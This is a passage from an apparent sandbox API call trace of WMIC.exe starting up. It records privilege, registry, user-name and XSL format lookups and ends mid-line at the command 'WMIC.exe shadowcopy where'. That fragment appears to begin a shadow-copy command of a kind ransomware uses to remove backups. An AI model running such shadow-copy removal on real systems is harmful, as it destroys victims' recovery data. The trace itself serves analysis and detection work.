(Luid.LowPart=0x2, Luid.HighPart=1003694799, Attributes=0x6b1d), (Luid.LowPart=0x0, Luid.HighPart=5013216, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0094.963] free (_Block=0x4c69a0) [0094.963] CloseHandle (hObject=0xf4) returned 1 [0094.963] malloc (_Size=0x40) returned 0x4c7ee0 [0094.963] malloc (_Size=0x40) returned 0x4c7f30 [0094.963] malloc (_Size=0x40) returned 0x4c7f80 [0094.963] malloc (_Size=0x20a) returned 0x4c69a0 [0094.963] GetSystemDirectoryW (in: lpBuffer=0x4c69a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0094.963] free (_Block=0x4c69a0) [0094.963] malloc (_Size=0x18) returned 0x2fdfb0 [0094.963] malloc (_Size=0x18) returned 0x4c69a0 [0094.963] malloc (_Size=0x18) returned 0x4c69c0 [0094.963] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0094.963] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0094.964] free (_Block=0x2fdfb0) [0094.964] free (_Block=0x4c69a0) [0094.964] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0094.964] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0094.964] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0094.964] FreeLibrary (hLibModule=0x77940000) returned 1 [0094.964] free (_Block=0x4c69c0) [0094.964] _vsnwprintf (in: _Buffer=0x4c7f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x18f7e8 | out: _Buffer="ms_409") returned 6 [0094.964] malloc (_Size=0x20) returned 0x4c69a0 [0094.964] GetComputerNameW (in: lpBuffer=0x4c69a0, nSize=0x18fbc0 | out: lpBuffer="XDUWTFONO", nSize=0x18fbc0) returned 1 [0094.965] lstrlenW (lpString="XDUWTFONO") returned 9 [0094.965] malloc (_Size=0x14) returned 0x2fdfb0 [0094.965] lstrlenW (lpString="XDUWTFONO") returned 9 [0094.965] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x18fbb8 | out: lpNameBuffer=0x0, nSize=0x18fbb8) returned 0x7fffffde000 [0094.966] GetLastError () returned 0xea [0094.966] malloc (_Size=0x40) returned 0x4c69d0 [0094.966] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x4c69d0, nSize=0x18fbb8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18fbb8) returned 0x1 [0094.966] lstrlenW (lpString="") returned 0 [0094.966] lstrlenW (lpString="XDUWTFONO") returned 9 [0094.966] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0094.967] lstrlenW (lpString=".") returned 1 [0094.967] lstrlenW (lpString="XDUWTFONO") returned 9 [0094.967] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0094.967] lstrlenW (lpString="LOCALHOST") returned 9 [0094.967] lstrlenW (lpString="XDUWTFONO") returned 9 [0094.967] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0094.967] lstrlenW (lpString="XDUWTFONO") returned 9 [0094.967] lstrlenW (lpString="XDUWTFONO") returned 9 [0094.967] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0094.967] free (_Block=0x2fdfb0) [0094.967] lstrlenW (lpString="XDUWTFONO") returned 9 [0094.967] malloc (_Size=0x14) returned 0x2fdfb0 [0094.967] lstrlenW (lpString="XDUWTFONO") returned 9 [0094.967] lstrlenW (lpString="XDUWTFONO") returned 9 [0094.967] malloc (_Size=0x14) returned 0x4c6a20 [0094.967] lstrlenW (lpString="XDUWTFONO") returned 9 [0094.967] malloc (_Size=0x8) returned 0x4c6a40 [0094.967] malloc (_Size=0x18) returned 0x4c6a60 [0094.967] malloc (_Size=0x30) returned 0x4c6a80 [0094.968] malloc (_Size=0x18) returned 0x4c6ac0 [0094.968] SysStringLen (param_1="IDENTIFY") returned 0x8 [0094.968] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0094.968] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0094.968] SysStringLen (param_1="IDENTIFY") returned 0x8 [0094.968] malloc (_Size=0x30) returned 0x4c6ae0 [0094.968] malloc (_Size=0x18) returned 0x4c6b20 [0094.968] SysStringLen (param_1="IMPERSONATE") returned 0xb [0094.968] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0094.968] SysStringLen (param_1="IMPERSONATE") returned 0xb [0094.968] SysStringLen (param_1="IDENTIFY") returned 0x8 [0094.968] SysStringLen (param_1="IDENTIFY") returned 0x8 [0094.968] SysStringLen (param_1="IMPERSONATE") returned 0xb [0094.968] malloc (_Size=0x30) returned 0x4c6b40 [0094.968] malloc (_Size=0x18) returned 0x4c6b80 [0094.968] SysStringLen (param_1="DELEGATE") returned 0x8 [0094.968] SysStringLen (param_1="IDENTIFY") returned 0x8 [0094.968] SysStringLen (param_1="DELEGATE") returned 0x8 [0094.968] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0094.968] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0094.968] SysStringLen (param_1="DELEGATE") returned 0x8 [0094.968] malloc (_Size=0x30) returned 0x4c6ba0 [0094.968] malloc (_Size=0x18) returned 0x4c6be0 [0094.968] malloc (_Size=0x30) returned 0x4c6c00 [0094.968] malloc (_Size=0x18) returned 0x4c6c40 [0094.968] SysStringLen (param_1="NONE") returned 0x4 [0094.968] SysStringLen (param_1="DEFAULT") returned 0x7 [0094.968] SysStringLen (param_1="DEFAULT") returned 0x7 [0094.969] SysStringLen (param_1="NONE") returned 0x4 [0094.969] malloc (_Size=0x30) returned 0x4c6c60 [0094.969] malloc (_Size=0x18) returned 0x4c6ca0 [0094.969] SysStringLen (param_1="CONNECT") returned 0x7 [0094.969] SysStringLen (param_1="DEFAULT") returned 0x7 [0094.969] malloc (_Size=0x30) returned 0x4c6cc0 [0094.969] malloc (_Size=0x18) returned 0x4c6d00 [0094.969] SysStringLen (param_1="CALL") returned 0x4 [0094.969] SysStringLen (param_1="DEFAULT") returned 0x7 [0094.969] SysStringLen (param_1="CALL") returned 0x4 [0094.969] SysStringLen (param_1="CONNECT") returned 0x7 [0094.969] malloc (_Size=0x30) returned 0x4c6d20 [0094.969] malloc (_Size=0x18) returned 0x4c6d60 [0094.969] SysStringLen (param_1="PKT") returned 0x3 [0094.969] SysStringLen (param_1="DEFAULT") returned 0x7 [0094.969] SysStringLen (param_1="PKT") returned 0x3 [0094.969] SysStringLen (param_1="NONE") returned 0x4 [0094.969] SysStringLen (param_1="NONE") returned 0x4 [0094.969] SysStringLen (param_1="PKT") returned 0x3 [0094.969] malloc (_Size=0x30) returned 0x4c6d80 [0094.969] malloc (_Size=0x18) returned 0x4c6dc0 [0094.969] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0094.969] SysStringLen (param_1="DEFAULT") returned 0x7 [0094.969] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0094.969] SysStringLen (param_1="NONE") returned 0x4 [0094.969] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0094.969] SysStringLen (param_1="PKT") returned 0x3 [0094.969] SysStringLen (param_1="PKT") returned 0x3 [0094.969] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0094.969] malloc (_Size=0x30) returned 0x4c8000 [0094.970] malloc (_Size=0x18) returned 0x4c6de0 [0094.970] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0094.970] SysStringLen (param_1="DEFAULT") returned 0x7 [0094.970] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0094.970] SysStringLen (param_1="PKT") returned 0x3 [0094.970] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0094.970] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0094.970] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0094.970] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0094.970] malloc (_Size=0x30) returned 0x4c8040 [0094.970] malloc (_Size=0x40) returned 0x4c6e00 [0094.970] malloc (_Size=0x20a) returned 0x4c6e50 [0094.971] GetSystemDirectoryW (in: lpBuffer=0x4c6e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0094.971] free (_Block=0x4c6e50) [0094.971] malloc (_Size=0x18) returned 0x4c6e50 [0094.971] malloc (_Size=0x18) returned 0x4c6e70 [0094.971] malloc (_Size=0x18) returned 0x4c6e90 [0094.971] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0094.971] SysStringLen (param_1="\\wbem\\") returned 0x6 [0094.971] free (_Block=0x4c6e50) [0094.971] free (_Block=0x4c6e70) [0094.971] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0094.971] free (_Block=0x4c6e90) [0094.971] malloc (_Size=0x18) returned 0x4c6e50 [0094.971] malloc (_Size=0x18) returned 0x4c6e70 [0094.971] malloc (_Size=0x18) returned 0x4c6e90 [0094.971] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0094.971] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0094.971] free (_Block=0x4c6e50) [0094.971] free (_Block=0x4c6e70) [0094.971] GetCurrentThreadId () returned 0x618 [0094.972] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x18f4c0 | out: phkResult=0x18f4c0*=0xf8) returned 0x0 [0094.972] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x18f510, lpcbData=0x18f4b0*=0x400 | out: lpType=0x0, lpData=0x18f510*=0x30, lpcbData=0x18f4b0*=0x4) returned 0x0 [0094.972] _wcsicmp (_String1="0", _String2="1") returned -1 [0094.972] _wcsicmp (_String1="0", _String2="2") returned -2 [0094.972] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x18f4b0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x18f4b0*=0x42) returned 0x0 [0094.972] malloc (_Size=0x86) returned 0x4c6eb0 [0094.972] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x4c6eb0, lpcbData=0x18f4b0*=0x42 | out: lpType=0x0, lpData=0x4c6eb0*=0x25, lpcbData=0x18f4b0*=0x42) returned 0x0 [0094.972] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0094.972] malloc (_Size=0x42) returned 0x4c6f40 [0094.972] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0094.972] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x18f510, lpcbData=0x18f4b0*=0x400 | out: lpType=0x0, lpData=0x18f510*=0x36, lpcbData=0x18f4b0*=0xc) returned 0x0 [0094.972] _wtol (_String="65536") returned 65536 [0094.972] free (_Block=0x4c6eb0) [0094.972] RegCloseKey (hKey=0x0) returned 0x6 [0094.972] CoCreateInstance (in: rclsid=0xff387410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff3873f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x18f9b8 | out: ppv=0x18f9b8*=0x1c971d0) returned 0x0 [0094.987] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x1c971d0, xmlSource=0x18fb00*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x4c6e50), isSuccessful=0x18fb70 | out: isSuccessful=0x18fb70*=0xffff) returned 0x0 [0095.078] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x1c971d0, DOMElement=0x18f9b0 | out: DOMElement=0x18f9b0) returned 0x0 [0095.078] malloc (_Size=0x18) returned 0x4c6e50 [0095.078] free (_Block=0x4c6e50) [0095.078] malloc (_Size=0x18) returned 0x4c6e50 [0095.078] free (_Block=0x4c6e50) [0095.079] malloc (_Size=0x18) returned 0x4c6e50 [0095.079] malloc (_Size=0x18) returned 0x4c6e70 [0095.079] malloc (_Size=0x30) returned 0x4c8080 [0095.079] malloc (_Size=0x18) returned 0x4c6eb0 [0095.079] free (_Block=0x4c6eb0) [0095.079] malloc (_Size=0x18) returned 0x4cc560 [0095.079] malloc (_Size=0x18) returned 0x4cc580 [0095.079] SysStringLen (param_1="VALUE") returned 0x5 [0095.079] SysStringLen (param_1="TABLE") returned 0x5 [0095.079] SysStringLen (param_1="TABLE") returned 0x5 [0095.079] SysStringLen (param_1="VALUE") returned 0x5 [0095.079] malloc (_Size=0x30) returned 0x4c80c0 [0095.079] malloc (_Size=0x18) returned 0x4cc5a0 [0095.080] free (_Block=0x4cc5a0) [0095.080] malloc (_Size=0x18) returned 0x4cc5a0 [0095.080] malloc (_Size=0x18) returned 0x4cc5c0 [0095.080] SysStringLen (param_1="LIST") returned 0x4 [0095.080] SysStringLen (param_1="TABLE") returned 0x5 [0095.080] malloc (_Size=0x30) returned 0x4c8100 [0095.080] malloc (_Size=0x18) returned 0x4cc5e0 [0095.080] free (_Block=0x4cc5e0) [0095.080] malloc (_Size=0x18) returned 0x4cc5e0 [0095.080] malloc (_Size=0x18) returned 0x4cc600 [0095.080] SysStringLen (param_1="RAWXML") returned 0x6 [0095.080] SysStringLen (param_1="TABLE") returned 0x5 [0095.080] SysStringLen (param_1="RAWXML") returned 0x6 [0095.080] SysStringLen (param_1="LIST") returned 0x4 [0095.080] SysStringLen (param_1="LIST") returned 0x4 [0095.080] SysStringLen (param_1="RAWXML") returned 0x6 [0095.080] malloc (_Size=0x30) returned 0x4c8140 [0095.081] malloc (_Size=0x18) returned 0x4cc620 [0095.081] free (_Block=0x4cc620) [0095.081] malloc (_Size=0x18) returned 0x4cc620 [0095.081] malloc (_Size=0x18) returned 0x4cc640 [0095.081] SysStringLen (param_1="HTABLE") returned 0x6 [0095.081] SysStringLen (param_1="TABLE") returned 0x5 [0095.081] SysStringLen (param_1="HTABLE") returned 0x6 [0095.081] SysStringLen (param_1="LIST") returned 0x4 [0095.081] malloc (_Size=0x30) returned 0x4c8180 [0095.081] malloc (_Size=0x18) returned 0x4cc660 [0095.081] free (_Block=0x4cc660) [0095.081] malloc (_Size=0x18) returned 0x4cc660 [0095.081] malloc (_Size=0x18) returned 0x4cc680 [0095.081] SysStringLen (param_1="HFORM") returned 0x5 [0095.081] SysStringLen (param_1="TABLE") returned 0x5 [0095.081] SysStringLen (param_1="HFORM") returned 0x5 [0095.081] SysStringLen (param_1="LIST") returned 0x4 [0095.081] SysStringLen (param_1="HFORM") returned 0x5 [0095.081] SysStringLen (param_1="HTABLE") returned 0x6 [0095.081] malloc (_Size=0x30) returned 0x4c81c0 [0095.082] malloc (_Size=0x18) returned 0x4cc6a0 [0095.082] free (_Block=0x4cc6a0) [0095.082] malloc (_Size=0x18) returned 0x4cc6a0 [0095.082] malloc (_Size=0x18) returned 0x4cc6c0 [0095.082] SysStringLen (param_1="XML") returned 0x3 [0095.082] SysStringLen (param_1="TABLE") returned 0x5 [0095.082] SysStringLen (param_1="XML") returned 0x3 [0095.082] SysStringLen (param_1="VALUE") returned 0x5 [0095.082] SysStringLen (param_1="VALUE") returned 0x5 [0095.082] SysStringLen (param_1="XML") returned 0x3 [0095.082] malloc (_Size=0x30) returned 0x4c8200 [0095.082] malloc (_Size=0x18) returned 0x4cc6e0 [0095.083] free (_Block=0x4cc6e0) [0095.083] malloc (_Size=0x18) returned 0x4cc6e0 [0095.083] malloc (_Size=0x18) returned 0x4cc700 [0095.083] SysStringLen (param_1="MOF") returned 0x3 [0095.083] SysStringLen (param_1="TABLE") returned 0x5 [0095.083] SysStringLen (param_1="MOF") returned 0x3 [0095.083] SysStringLen (param_1="LIST") returned 0x4 [0095.083] SysStringLen (param_1="MOF") returned 0x3 [0095.083] SysStringLen (param_1="RAWXML") returned 0x6 [0095.083] SysStringLen (param_1="LIST") returned 0x4 [0095.083] SysStringLen (param_1="MOF") returned 0x3 [0095.083] malloc (_Size=0x30) returned 0x4c8240 [0095.083] malloc (_Size=0x18) returned 0x4cc720 [0095.083] free (_Block=0x4cc720) [0095.083] malloc (_Size=0x18) returned 0x4cc720 [0095.083] malloc (_Size=0x18) returned 0x4cc740 [0095.083] SysStringLen (param_1="CSV") returned 0x3 [0095.083] SysStringLen (param_1="TABLE") returned 0x5 [0095.084] SysStringLen (param_1="CSV") returned 0x3 [0095.084] SysStringLen (param_1="LIST") returned 0x4 [0095.084] SysStringLen (param_1="CSV") returned 0x3 [0095.084] SysStringLen (param_1="HTABLE") returned 0x6 [0095.084] SysStringLen (param_1="CSV") returned 0x3 [0095.084] SysStringLen (param_1="HFORM") returned 0x5 [0095.084] malloc (_Size=0x30) returned 0x4c8280 [0095.084] malloc (_Size=0x18) returned 0x4cc760 [0095.084] free (_Block=0x4cc760) [0095.084] malloc (_Size=0x18) returned 0x4cc760 [0095.084] malloc (_Size=0x18) returned 0x4cc780 [0095.084] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.084] SysStringLen (param_1="TABLE") returned 0x5 [0095.084] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.084] SysStringLen (param_1="VALUE") returned 0x5 [0095.084] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.084] SysStringLen (param_1="XML") returned 0x3 [0095.084] SysStringLen (param_1="XML") returned 0x3 [0095.084] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.084] malloc (_Size=0x30) returned 0x4c82c0 [0095.085] malloc (_Size=0x18) returned 0x4cc7a0 [0095.085] free (_Block=0x4cc7a0) [0095.085] malloc (_Size=0x18) returned 0x4cc7a0 [0095.085] malloc (_Size=0x18) returned 0x4cc7c0 [0095.085] SysStringLen (param_1="texttablewsys") returned 0xd [0095.085] SysStringLen (param_1="TABLE") returned 0x5 [0095.085] SysStringLen (param_1="texttablewsys") returned 0xd [0095.085] SysStringLen (param_1="XML") returned 0x3 [0095.085] SysStringLen (param_1="texttablewsys") returned 0xd [0095.085] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.085] SysStringLen (param_1="XML") returned 0x3 [0095.085] SysStringLen (param_1="texttablewsys") returned 0xd [0095.085] malloc (_Size=0x30) returned 0x4c8300 [0095.085] malloc (_Size=0x18) returned 0x4cc7e0 [0095.085] free (_Block=0x4cc7e0) [0095.085] malloc (_Size=0x18) returned 0x4cc7e0 [0095.085] malloc (_Size=0x18) returned 0x4cc800 [0095.085] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0095.085] SysStringLen (param_1="TABLE") returned 0x5 [0095.085] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0095.085] SysStringLen (param_1="XML") returned 0x3 [0095.086] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0095.086] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.086] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.086] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0095.086] malloc (_Size=0x30) returned 0x4c8340 [0095.086] malloc (_Size=0x18) returned 0x4cc820 [0095.086] free (_Block=0x4cc820) [0095.086] malloc (_Size=0x18) returned 0x4cc820 [0095.086] malloc (_Size=0x18) returned 0x4cc840 [0095.086] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0095.086] SysStringLen (param_1="TABLE") returned 0x5 [0095.086] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0095.086] SysStringLen (param_1="XML") returned 0x3 [0095.086] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0095.086] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.086] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0095.086] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0095.086] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.086] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0095.086] malloc (_Size=0x30) returned 0x4c8380 [0095.086] malloc (_Size=0x18) returned 0x4cc860 [0095.087] free (_Block=0x4cc860) [0095.087] malloc (_Size=0x18) returned 0x4cc860 [0095.087] malloc (_Size=0x18) returned 0x4cc880 [0095.087] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0095.087] SysStringLen (param_1="TABLE") returned 0x5 [0095.087] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0095.087] SysStringLen (param_1="XML") returned 0x3 [0095.087] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0095.087] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.087] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0095.087] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0095.087] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0095.087] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0095.087] malloc (_Size=0x30) returned 0x4c83c0 [0095.087] malloc (_Size=0x18) returned 0x4cc8a0 [0095.087] free (_Block=0x4cc8a0) [0095.087] malloc (_Size=0x18) returned 0x4cc8a0 [0095.087] malloc (_Size=0x18) returned 0x4cc8c0 [0095.087] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0095.087] SysStringLen (param_1="TABLE") returned 0x5 [0095.087] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0095.087] SysStringLen (param_1="XML") returned 0x3 [0095.088] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0095.088] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.088] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0095.088] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0095.088] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0095.088] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0095.088] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0095.088] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0095.088] malloc (_Size=0x30) returned 0x4c8400 [0095.088] malloc (_Size=0x18) returned 0x4cc8e0 [0095.088] free (_Block=0x4cc8e0) [0095.088] malloc (_Size=0x18) returned 0x4cc8e0 [0095.088] malloc (_Size=0x18) returned 0x4cc900 [0095.088] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0095.088] SysStringLen (param_1="TABLE") returned 0x5 [0095.088] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0095.088] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.088] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0095.088] SysStringLen (param_1="XML") returned 0x3 [0095.088] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0095.088] SysStringLen (param_1="texttablewsys") returned 0xd [0095.088] SysStringLen (param_1="XML") returned 0x3 [0095.088] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0095.088] malloc (_Size=0x30) returned 0x4c8440 [0095.089] malloc (_Size=0x18) returned 0x4cc920 [0095.089] free (_Block=0x4cc920) [0095.089] malloc (_Size=0x18) returned 0x4cc920 [0095.089] malloc (_Size=0x18) returned 0x4cc940 [0095.089] SysStringLen (param_1="htable-sortby") returned 0xd [0095.089] SysStringLen (param_1="TABLE") returned 0x5 [0095.089] SysStringLen (param_1="htable-sortby") returned 0xd [0095.089] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.089] SysStringLen (param_1="htable-sortby") returned 0xd [0095.089] SysStringLen (param_1="XML") returned 0x3 [0095.089] SysStringLen (param_1="htable-sortby") returned 0xd [0095.089] SysStringLen (param_1="texttablewsys") returned 0xd [0095.089] SysStringLen (param_1="htable-sortby") returned 0xd [0095.089] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0095.089] SysStringLen (param_1="XML") returned 0x3 [0095.089] SysStringLen (param_1="htable-sortby") returned 0xd [0095.089] malloc (_Size=0x30) returned 0x4c8480 [0095.089] malloc (_Size=0x18) returned 0x4cc960 [0095.089] free (_Block=0x4cc960) [0095.089] malloc (_Size=0x18) returned 0x4cc960 [0095.090] malloc (_Size=0x18) returned 0x4cc980 [0095.090] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0095.090] SysStringLen (param_1="TABLE") returned 0x5 [0095.090] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0095.090] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.090] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0095.090] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0095.090] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0095.090] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0095.090] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.090] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0095.090] malloc (_Size=0x30) returned 0x4c84c0 [0095.090] malloc (_Size=0x18) returned 0x4cc9a0 [0095.090] free (_Block=0x4cc9a0) [0095.090] malloc (_Size=0x18) returned 0x4cc9a0 [0095.090] malloc (_Size=0x18) returned 0x4cc9c0 [0095.090] SysStringLen (param_1="wmiclimofformat") returned 0xf [0095.090] SysStringLen (param_1="TABLE") returned 0x5 [0095.090] SysStringLen (param_1="wmiclimofformat") returned 0xf [0095.090] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.090] SysStringLen (param_1="wmiclimofformat") returned 0xf [0095.090] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0095.090] SysStringLen (param_1="wmiclimofformat") returned 0xf [0095.090] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0095.091] SysStringLen (param_1="wmiclimofformat") returned 0xf [0095.091] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0095.091] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.091] SysStringLen (param_1="wmiclimofformat") returned 0xf [0095.091] malloc (_Size=0x30) returned 0x4c8500 [0095.091] malloc (_Size=0x18) returned 0x4cc9e0 [0095.091] free (_Block=0x4cc9e0) [0095.091] malloc (_Size=0x18) returned 0x4cc9e0 [0095.091] malloc (_Size=0x18) returned 0x4cca00 [0095.091] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0095.091] SysStringLen (param_1="TABLE") returned 0x5 [0095.091] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0095.091] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.091] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0095.091] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0095.091] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0095.091] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0095.091] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0095.091] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0095.091] malloc (_Size=0x30) returned 0x4c8540 [0095.091] malloc (_Size=0x18) returned 0x4cca20 [0095.092] free (_Block=0x4cca20) [0095.092] malloc (_Size=0x18) returned 0x4cca20 [0095.092] malloc (_Size=0x18) returned 0x4cca40 [0095.092] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0095.092] SysStringLen (param_1="TABLE") returned 0x5 [0095.092] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0095.092] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.092] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0095.092] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0095.092] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0095.092] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0095.092] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0095.092] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0095.092] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0095.092] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0095.092] malloc (_Size=0x30) returned 0x4c8580 [0095.092] FreeThreadedDOMDocument:IUnknown:Release (This=0x1c971d0) returned 0x0 [0095.092] free (_Block=0x4c6e90) [0095.092] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where 